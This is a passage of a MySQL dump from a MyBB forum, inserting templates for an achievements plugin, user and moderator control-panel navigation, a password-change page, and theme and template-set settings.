href=\"modcp.php?action=achivements&mod=give&acid={$custom[\'acid\']}\" />{$lang->give}</a></td> <td class=\"{$trow}\" width=\"10%\" align=\"center\"><a href=\"modcp.php?action=achivements&mod=quit&acid={$custom[\'acid\']}\" />{$lang->quit}</a></td> </tr>', '-1', '1604', '', '1350790438'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2077', 'achivements_usercp_all', '<label for=\"{$logro[\'name\']}\"><input type=\"checkbox\" name=\"showachivement[]\" value=\"{$id}\" /> {$achivement}</label>', '-1', '1604', '', '1350790438'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2078', 'achivements_modcp', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->achivements}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"4\"><strong>{$lang->custom_modules}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"10%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->image}</strong></span> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->namedescription}</strong></span> <td class=\"tcat\" width=\"20%\" align=\"center\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->option}</strong></span> </td> <tr> {$custom_achivements} </tr> </table> </td> </tr> </table> {$footer} </body> </html>', '-1', '1604', '', '1350790438'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2079', 'achivements_modcp_give', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->giveachivements}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> <form action=\"modcp.php?action=achivements\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"mod\" value=\"{$mybb->input[\'mod\']}\" /> <input type=\"hidden\" name=\"acid\" value=\"{$mybb->input[\'acid\']}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->giveuserform}</strong></td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->user}</strong>:</td> <td class=\"trow2\"><input type=\"text\" class=\"textbox\" id=\"username\" name=\"username\" size=\"40\" maxlength=\"85\" tabindex=\"1\" /></td> </table> <br /> <div style=\"text-align:center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->giveachivements}\"/></div> </form> </td> </tr> </table> {$footer} <script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { new autoComplete(\"username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"}); } // --> </script> </body> </html>', '-1', '1604', '', '1350790438'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2074', 'achivements_profile', '<br /> <table id=\"achivements\" border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->achsmemprofile}</strong></td> </tr> <tr> <td class=\"trow1\"> {$achivements} </td> </tr> </table>', '-1', '1604', '', '1350790438'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2075', 'achivements_postbit', '{$lang->achivements}: {$achivements}', '-1', '1604', '', '1350790438'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2076', 'achivements_usercp', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->achivements}</title> {$headerinclude} <script languaje=\"javascript\"> function select_all_achivements(){ for (i=0;i<document.achivements_form.elements.length;i++) if(document.achivements_form.elements[i].type == \"checkbox\") document.achivements_form.elements[i].checked=1 } function unselect_all_achivements(){ for (i=0;i<document.achivements_form.elements.length;i++) if(document.achivements_form.elements[i].type == \"checkbox\") document.achivements_form.elements[i].checked=0 } </script> </head> <body> {$header} <form method=\"post\" name=\"achivements_form\" enctype=\"multipart/form-data\" action=\"usercp.php\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$errors} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->achivements}</strong></td> </tr> <tr> <td class=\"tcat\"><strong>{$lang->achivementscurrentprofile}</strong></td> </tr> <tr> <td class=\"trow1\">{$currentachivements}</td> </tr> <tr> <td class=\"tcat\"><strong>{$lang->achivementscurrentpostbit}</strong></td> </tr> <tr> <td class=\"trow1\">{$currentachivementspostbit}</td> </tr> <tr> <td class=\"tcat\"><strong>{$lang->myachivements}</strong></td> </tr> <tr> <td class=\"trow2\"> <a href=\"javascript:select_all_achivements()\"><small>{$lang->markall}</small></a> | <a href=\"javascript:unselect_all_achivements()\"><small>{$lang->marknone}</small></a><br /> {$achivements}</td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_achivements\" /> <input type=\"submit\" class=\"button\" name=\"profile\" value=\"{$lang->showinprofile}\" /> <input type=\"submit\" class=\"button\" name=\"postbit\" value=\"{$lang->showinpostbit}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-1', '1604', '', '1350790438'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2072', 'achivements_empty', '<tr><td class=\"trow1\" colspan=\"4\" align=\"center\">{$lang->achiviementstableempty}</td></tr>', '-1', '1604', '', '1350790438'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2073', 'achivements_list', '<tr> <td class=\"{$color}\" width=\"10%\" align=\"center\"><img src=\"{$achivements[\'image\']}\" /></td> <td class=\"{$color}\" width=\"10%\" align=\"center\">{$value}</td> <td class=\"{$color}\" width=\"20%\">{$achivements[\'name\']}</td> <td class=\"{$color}\">{$achivements[\'description\']}</td> </tr>', '-1', '1604', '', '1350790438'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2067', 'usercp_nav_profile', '<tr> <td class=\"tcat\"> <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'usercpprofile\']}.gif\" id=\"usercpprofile_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div> <div><span class=\"smalltext\"><strong>{$lang->ucp_nav_profile}</strong></span></div> </td> </tr> <tbody style=\"{$collapsed[\'usercpprofile_e\']}\" id=\"usercpprofile_e\"> <tr><td class=\"trow1 smalltext\"> <div><a href=\"usercp.php?action=profile\" class=\"usercp_nav_item usercp_nav_profile\">{$lang->ucp_nav_edit_profile}</a></div> {$changenameop} <div><a href=\"usercp.php?action=password\" class=\"usercp_nav_item usercp_nav_password\">{$lang->ucp_nav_change_pass}</a></div> <div><a href=\"usercp.php?action=email\" class=\"usercp_nav_item usercp_nav_email\">{$lang->ucp_nav_change_email}</a></div> <div><a href=\"usercp.php?action=avatar\" class=\"usercp_nav_item usercp_nav_avatar\">{$lang->ucp_nav_change_avatar}</a></div> {$changesigop}<!-- usercp_achivements --><div><a href=\"usercp.php?action=achivements\" class=\"usercp_nav_item\" style=\"padding-left: 40px;background: url(inc/plugins/achivements/include/images/achivements_usercp.png) no-repeat left center;\">Achivements</a></div><!-- /usercp_achivements --> </td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=options\" class=\"usercp_nav_item usercp_nav_options\">{$lang->ucp_nav_edit_options}</a></td></tr> </tbody>', '1', '1608', '', '1350764104'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2068', 'usercp_nav_profile', '<tr> <td class=\"tcat\"> <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'usercpprofile\']}.gif\" id=\"usercpprofile_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div> <div><span class=\"smalltext\"><strong>{$lang->ucp_nav_profile}</strong></span></div> </td> </tr> <tbody style=\"{$collapsed[\'usercpprofile_e\']}\" id=\"usercpprofile_e\"> <tr><td class=\"trow1 smalltext\"> <div><a href=\"usercp.php?action=profile\" class=\"usercp_nav_item usercp_nav_profile\">{$lang->ucp_nav_edit_profile}</a></div> {$changenameop} <div><a href=\"usercp.php?action=password\" class=\"usercp_nav_item usercp_nav_password\">{$lang->ucp_nav_change_pass}</a></div> <div><a href=\"usercp.php?action=email\" class=\"usercp_nav_item usercp_nav_email\">{$lang->ucp_nav_change_email}</a></div> <div><a href=\"usercp.php?action=avatar\" class=\"usercp_nav_item usercp_nav_avatar\">{$lang->ucp_nav_change_avatar}</a></div> {$changesigop}<!-- usercp_achivements --><div><a href=\"usercp.php?action=achivements\" class=\"usercp_nav_item\" style=\"padding-left: 40px;background: url(inc/plugins/achivements/include/images/achivements_usercp.png) no-repeat left center;\">Achivements</a></div><!-- /usercp_achivements --> </td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=options\" class=\"usercp_nav_item usercp_nav_options\">{$lang->ucp_nav_edit_options}</a></td></tr> </tbody>', '8', '1608', '', '1350764104'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2069', 'modcp_nav', '<td width=\"{$lang->nav_width}\" valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->nav_menu}</strong></td> </tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php\" class=\"modcp_nav_item modcp_nav_home\">{$lang->mcp_nav_home}</a></td></tr> <tr> <td class=\"tcat\"> <div class=\"float_right\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'modcpforums\']}.gif\" id=\"modcpforums_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div> <div><span class=\"smalltext\"><strong>{$lang->mcp_nav_forums}</strong></span></div> </td> </tr> <tbody style=\"{$collapsed[\'modcpforums_e\']}\" id=\"modcpforums_e\"> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=announcements\" class=\"modcp_nav_item modcp_nav_announcements\">{$lang->mcp_nav_announcements}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=modqueue\" class=\"modcp_nav_item modcp_nav_modqueue\">{$lang->mcp_nav_modqueue}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=reports\" class=\"modcp_nav_item modcp_nav_reports\">{$lang->mcp_nav_reported_posts}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=modlogs\" class=\"modcp_nav_item modcp_nav_modlogs\">{$lang->mcp_nav_modlogs}</a></td></tr> </tbody> <tr> <td class=\"tcat\"> <div class=\"float_right\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'modcpusers\']}.gif\" id=\"modcpusers_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div> <div><span class=\"smalltext\"><strong>{$lang->mcp_nav_users}</strong></span></div> </td> </tr> <tbody style=\"{$collapsed[\'modcpusers_e\']}\" id=\"modcpusers_e\"> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=finduser\" class=\"modcp_nav_item modcp_nav_editprofile\">{$lang->mcp_nav_editprofile}</a></td></tr><!--modcp_achivements--> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=banning\" class=\"modcp_nav_item modcp_nav_banning\">{$lang->mcp_nav_banning}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=warninglogs\" class=\"modcp_nav_item modcp_nav_warninglogs\">{$lang->mcp_nav_warninglogs}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=ipsearch\" class=\"modcp_nav_item modcp_nav_ipsearch\">{$lang->mcp_nav_ipsearch}</a></td></tr> </tbody> </table> </td>', '1', '1608', '', '1350764104'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2070', 'modcp_nav', '<td width=\"{$lang->nav_width}\" valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->nav_menu}</strong></td> </tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php\" class=\"modcp_nav_item modcp_nav_home\">{$lang->mcp_nav_home}</a></td></tr> <tr> <td class=\"tcat\"> <div class=\"float_right\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'modcpforums\']}.gif\" id=\"modcpforums_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div> <div><span class=\"smalltext\"><strong>{$lang->mcp_nav_forums}</strong></span></div> </td> </tr> <tbody style=\"{$collapsed[\'modcpforums_e\']}\" id=\"modcpforums_e\"> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=announcements\" class=\"modcp_nav_item modcp_nav_announcements\">{$lang->mcp_nav_announcements}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=modqueue\" class=\"modcp_nav_item modcp_nav_modqueue\">{$lang->mcp_nav_modqueue}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=reports\" class=\"modcp_nav_item modcp_nav_reports\">{$lang->mcp_nav_reported_posts}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=modlogs\" class=\"modcp_nav_item modcp_nav_modlogs\">{$lang->mcp_nav_modlogs}</a></td></tr> </tbody> <tr> <td class=\"tcat\"> <div class=\"float_right\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'modcpusers\']}.gif\" id=\"modcpusers_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div> <div><span class=\"smalltext\"><strong>{$lang->mcp_nav_users}</strong></span></div> </td> </tr> <tbody style=\"{$collapsed[\'modcpusers_e\']}\" id=\"modcpusers_e\"> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=finduser\" class=\"modcp_nav_item modcp_nav_editprofile\">{$lang->mcp_nav_editprofile}</a></td></tr><!--modcp_achivements--> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=banning\" class=\"modcp_nav_item modcp_nav_banning\">{$lang->mcp_nav_banning}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=warninglogs\" class=\"modcp_nav_item modcp_nav_warninglogs\">{$lang->mcp_nav_warninglogs}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=ipsearch\" class=\"modcp_nav_item modcp_nav_ipsearch\">{$lang->mcp_nav_ipsearch}</a></td></tr> </tbody> </table> </td>', '8', '1608', '', '1350764104'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2071', 'achivements', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->achivements}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"4\"> <strong>{$lang->achivementsbyposts}</span></td> </tr> <tr> <td class=\"tcat\" width=\"10%\" align=\"center\"><strong>{$lang->image}</strong></td> <td class=\"tcat\" width=\"10%\" align=\"center\"><strong>{$lang->posts}</strong></td> <td class=\"tcat\" width=\"20%\"><strong>{$lang->name}</strong></td> <td class=\"tcat\"><strong>{$lang->description}</strong></td> </tr> {$posts} </table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"4\"> <strong>{$lang->achivementsbythreads}</span></td> </tr> <tr> <td class=\"tcat\" width=\"10%\" align=\"center\"><strong>{$lang->image}</strong></td> <td class=\"tcat\" width=\"10%\" align=\"center\"><strong>{$lang->threads}</strong></td> <td class=\"tcat\" width=\"20%\"><strong>{$lang->name}</strong></td> <td class=\"tcat\"><strong>{$lang->description}</strong></td> </tr> {$threads} </table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"4\"> <strong>{$lang->achivementsbyreputation}</span></td> </tr> <tr> <td class=\"tcat\" width=\"10%\" align=\"center\"><strong>{$lang->image}</strong></td> <td class=\"tcat\" width=\"10%\" align=\"center\"><strong>{$lang->reputation}</strong></td> <td class=\"tcat\" width=\"20%\"><strong>{$lang->name}</strong></td> <td class=\"tcat\"><strong>{$lang->description}</strong></td> </tr> {$reputation} </table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"4\"> <strong>{$lang->achivementsbytimeonline}</span></td> </tr> <tr> <td class=\"tcat\" width=\"10%\" align=\"center\"><strong>{$lang->image}</strong></td> <td class=\"tcat\" width=\"15%\" align=\"center\"><strong>{$lang->timeonline}</strong></td> <td class=\"tcat\" width=\"20%\"><strong>{$lang->name}</strong></td> <td class=\"tcat\"><strong>{$lang->description}</strong></td> </tr> {$timeonline} </table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"4\"> <strong>{$lang->achivementsbyregdate}</span></td> </tr> <tr> <td class=\"tcat\" width=\"10%\" align=\"center\"><strong>{$lang->image}</strong></td> <td class=\"tcat\" width=\"15%\" align=\"center\"><strong>{$lang->regdate}</strong></td> <td class=\"tcat\" width=\"20%\"><strong>{$lang->name}</strong></td> <td class=\"tcat\"><strong>{$lang->description}</strong></td> </tr> {$regdate} </table> </td> </tr> </table> {$footer} </body> </html>', '-1', '1604', '', '1350790438'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2083', 'hideUntilPost_box', '<div style=\"background: #DA0000; text-align: left; margin-left: 15px; padding: 13px 20px 13px 45px; border-top: 2px solid #000000; border-bottom: 2px solid #000000; line-height: 150%; margin-top: 5px; margin-bottom: 5px;\">{$msg}</div>', '-1', '1608', '', '1350857795'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2084', 'codebuttons', '<script type=\"text/javascript\" src=\"jscripts/editor.js?ver=1608\"></script> <script type=\"text/javascript\"> <!-- {$editor_language} var clickableEditor = new messageEditor(\"{$bind}\", {lang: editor_language, rtl: {$lang->settings[\'rtl\']}, theme: \"{$theme[\'editortheme\']}\"}); if(clickableEditor) { clickableEditor.bindSmilieInserter(\"clickable_smilies\"); } // --> </script>', '8', '1608', '', '1350877781'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2085', 'multipage', '<div class=\"pagination\"> <span class=\"pages\">{$lang->multipage_pages}</span> {$prevpage}{$start}{$mppage}{$end}{$nextpage} </div>', '8', '1608', '', '1350878341'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2086', 'multipage_breadcrumb', '<div id=\"breadcrumb_multipage_popup\" class=\"pagination pagination_breadcrumb\" style=\"display: none;\"> {$prevpage}{$start}{$mppage}{$end}{$nextpage} </div> <script type=\"text/javascript\"> // <!-- if(use_xmlhttprequest == \"1\") { new PopupMenu(\"breadcrumb_multipage\"); } // --> </script>', '8', '1608', '', '1350878623'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2087', 'forcepw_alert', '<div class=\"error\"><p><em>The Administrator is forcing you to change your password. You cannot use the rest of the forum until your password is changed.</em></p></div><br>', '-1', '', '', '1352782931'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2088', 'usercp_password', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->change_password}</title> {$headerinclude} </head> <body> {$header} <form action=\"usercp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$errors} {$forcepwalert} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->change_password}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->current_password}</strong></td> </tr> <tr> <td class=\"trow1\" colspan=\"2\" align=\"center\"><input type=\"password\" class=\"textbox\" name=\"oldpassword\" size=\"25\" /></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->please_enter_confirm_new_password}</strong></td> </tr> <tr> <td class=\"trow2\" width=\"40%\"><strong>{$lang->new_password}</strong></td> <td class=\"trow2\" width=\"60%\"><input type=\"password\" class=\"textbox\" name=\"password\" size=\"25\" /></td> </tr> <tr> <td class=\"trow1\" width=\"40%\"><strong>{$lang->confirm_password}</strong></td> <td class=\"trow1\" width=\"60%\"><input type=\"password\" class=\"textbox\" name=\"password2\" size=\"25\" /></td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_password\" /> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_password}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '1', '1608', '', '1352782931'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2089', 'usercp_password', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->change_password}</title> {$headerinclude} </head> <body> {$header} <form action=\"usercp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$errors} {$forcepwalert} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->change_password}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->current_password}</strong></td> </tr> <tr> <td class=\"trow1\" colspan=\"2\" align=\"center\"><input type=\"password\" class=\"textbox\" name=\"oldpassword\" size=\"25\" /></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->please_enter_confirm_new_password}</strong></td> </tr> <tr> <td class=\"trow2\" width=\"40%\"><strong>{$lang->new_password}</strong></td> <td class=\"trow2\" width=\"60%\"><input type=\"password\" class=\"textbox\" name=\"password\" size=\"25\" /></td> </tr> <tr> <td class=\"trow1\" width=\"40%\"><strong>{$lang->confirm_password}</strong></td> <td class=\"trow1\" width=\"60%\"><input type=\"password\" class=\"textbox\" name=\"password2\" size=\"25\" /></td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_password\" /> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_password}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '8', '1608', '', '1352782931'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_templatesets`; CREATE TABLE `mybb_templatesets` ( `sid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(120) NOT NULL DEFAULT '', PRIMARY KEY (`sid`) ) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_templatesets` WRITE; INSERT INTO `mybb_templatesets` (`sid`, `title`) VALUES ('1', 'Default Templates'); INSERT INTO `mybb_templatesets` (`sid`, `title`) VALUES ('8', 'Coder Green Templates'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_themes`; CREATE TABLE `mybb_themes` ( `tid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(100) NOT NULL DEFAULT '', `pid` smallint(5) unsigned NOT NULL DEFAULT '0', `def` smallint(1) NOT NULL DEFAULT '0', `properties` text NOT NULL, `stylesheets` text NOT NULL, `allowedgroups` text NOT NULL, PRIMARY KEY (`tid`) ) ENGINE=MyISAM AUTO_INCREMENT=12 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_themes` WRITE; INSERT INTO `mybb_themes` (`tid`, `name`, `pid`, `def`, `properties`, `stylesheets`, `allowedgroups`) VALUES ('1', 'MyBB Master Style', '0', '0', 'a:6:{s:11:\"templateset\";i:-2;s:6:\"imgdir\";s:6:\"images\";s:4:\"logo\";s:15:\"images/logo.gif\";s:10:\"tablespace\";s:1:\"4\";s:11:\"borderwidth\";s:1:\"1\";s:11:\"editortheme\";s:7:\"default\";}', 'a:8:{s:6:\"global\";a:1:{s:6:\"global\";a:1:{i:0;s:30:\"cache/themes/theme1/global.css\";}}s:10:\"usercp.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=2\";}}s:11:\"usercp2.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=2\";}}s:11:\"private.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=2\";}}s:9:\"modcp.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=3\";}}s:16:\"forumdisplay.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=4\";}}s:14:\"showthread.php\";a:1:{s:6:\"global\";a:2:{i:0;s:20:\"css.php?stylesheet=4\";i:1;s:20:\"css.php?stylesheet=5\";}}s:9:\"index.php\";a:1:{s:6:\"global\";a:1:{i:0;s:30:\"cache/themes/theme1/tabbed.css\";}}}', 'all'); INSERT INTO `mybb_themes` (`tid`, `name`, `pid`, `def`, `properties`, `stylesheets`, `allowedgroups`) VALUES ('2', 'Default', '1', '0', 'a:6:{s:11:\"templateset\";i:1;s:11:\"editortheme\";s:7:\"default\";s:6:\"imgdir\";s:6:\"images\";s:4:\"logo\";s:15:\"images/logo.gif\";s:10:\"tablespace\";i:4;s:11:\"borderwidth\";i:1;}', 'a:9:{s:6:\"global\";a:1:{s:6:\"global\";a:1:{i:0;s:30:\"cache/themes/theme1/global.css\";}}s:9:\"inherited\";a:8:{s:13:\"global_global\";a:1:{s:30:\"cache/themes/theme1/global.css\";s:1:\"1\";}s:17:\"usercp.php_global\";a:1:{s:20:\"css.php?stylesheet=2\";s:1:\"1\";}s:18:\"usercp2.php_global\";a:1:{s:20:\"css.php?stylesheet=2\";s:1:\"1\";}s:18:\"private.php_global\";a:1:{s:20:\"css.php?stylesheet=2\";s:1:\"1\";}s:16:\"modcp.php_global\";a:1:{s:20:\"css.php?stylesheet=3\";s:1:\"1\";}s:23:\"forumdisplay.php_global\";a:1:{s:20:\"css.php?stylesheet=4\";s:1:\"1\";}s:21:\"showthread.php_global\";a:2:{s:20:\"css.php?stylesheet=4\";s:1:\"1\";s:20:\"css.php?stylesheet=5\";s:1:\"1\";}s:16:\"index.php_global\";a:1:{s:30:\"cache/themes/theme1/tabbed.css\";s:1:\"1\";}}s:10:\"usercp.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=2\";}}s:11:\"usercp2.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=2\";}}s:11:\"private.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=2\";}}s:9:\"modcp.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=3\";}}s:16:\"forumdisplay.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=4\";}}s:14:\"showthread.php\";a:1:{s:6:\"global\";a:2:{i:0;s:20:\"css.php?stylesheet=4\";i:1;s:20:\"css.php?stylesheet=5\";}}s:9:\"index.php\";a:1:{s:6:\"global\";a:1:{i:0;s:30:\"cache/themes/theme1/tabbed.css\";}}}', '4'); INSERT INTO `mybb_themes` (`tid`, `name`, `pid`, `def`, `properties`, `stylesheets`, `allowedgroups`) VALUES ('10', 'Coder Green', '1', '1', 'a:6:{s:11:\"templateset\";i:8;s:11:\"editortheme\";s:7:\"default\";s:6:\"imgdir\";s:17:\"images/CoderGreen\";s:4:\"logo\";s:26:\"images/CoderGreen/logo.png\";s:10:\"tablespace\";i:4;s:11:\"borderwidth\";i:0;}', 